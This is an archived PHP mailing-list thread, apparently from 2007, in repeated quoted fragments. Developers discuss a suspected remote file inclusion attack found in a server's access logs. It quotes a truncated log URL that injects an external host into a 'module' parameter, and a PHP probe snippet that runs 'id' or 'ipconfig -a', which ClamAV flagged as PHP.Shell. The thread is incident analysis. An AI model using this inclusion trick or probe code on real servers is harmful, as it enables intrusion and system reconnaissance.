On 10/5/07, Paul Scott <[EMAIL PROTECTED]> wrote:
>
> On Fri, 2007-10-05 at 11:29 -0400, Daniel Brown wrote:
> > Yeah, honestly I wasn't sure if it was an injection attack or if
> > those URLs were referrers in the logs.
>
> OK sorry if I wasn't 100% clear here, but the logs showed up something
On Fri, 2007-10-05 at 11:29 -0400, Daniel Brown wrote:
> Yeah, honestly I wasn't sure if it was an injection attack or if
> those URLs were referrers in the logs.
OK sorry if I wasn't 100% clear here, but the logs showed up something
like:
http://fsiu.uwc.ac.za/index.php?module=http://www.go
Daniel Brown wrote:
Yeah, honestly I wasn't sure if it was an injection attack or if
those URLs were referrers in the logs.
If you hit the first URL ( http://www.vesprokat.ru/n ) with, say
lynx, you get that script coming up. So it could've been referral
hits. Which could mean the r
On 10/5/07, Ashley M. Kirchner <[EMAIL PROTECTED]> wrote:
> Daniel Brown wrote:
> > The biggest issue does still remain: if this is on your local
> > system, you need to figure out exactly how it got there in the first
> > place
> I thought the OP said he noticed it in his logs... I unders
Daniel Brown wrote:
The biggest issue does still remain: if this is on your local
system, you need to figure out exactly how it got there in the first
place
I thought the OP said he noticed it in his logs... I understood
that as someone cleverly trying to inject it somehow and it ended u
On 10/5/07, Paul Scott <[EMAIL PROTECTED]> wrote:
>
> On Fri, 2007-10-05 at 07:38 -0600, Ashley M. Kirchner wrote:
> > Quarantine Messages:
> > Message quarantined because of virus: PHP.Shell.
> >
> > Someone saw it somewhere and reported it...
>
> Don't you love Free Software?
On Fri, 2007-10-05 at 07:38 -0600, Ashley M. Kirchner wrote:
> Quarantine Messages:
> Message quarantined because of virus: PHP.Shell.
>
> Someone saw it somewhere and reported it...
Don't you love Free Software? ;)
--Paul
Paul Scott wrote:
I am taking a quick look through the access logs on our dev box, and
came across this little nasty that was trying to execute itself as an XSS
attack(?)
Interestingly enough, MimeDefang/ClamAV quarantined your message
because of that script:
Quarantine Messages:
I am taking a quick look through the access logs on our dev box, and
came across this little nasty that was trying to execute itself as an XSS
attack(?)
";
echo "SysOSx:$ker";
echo "SysOSx:$osx";
if ($osx == "WINNT") { $xeQt="ipconfig -a"; }
else { $xeQt="id"; }
$hitemup=ex($xeQt);
echo $hitemup;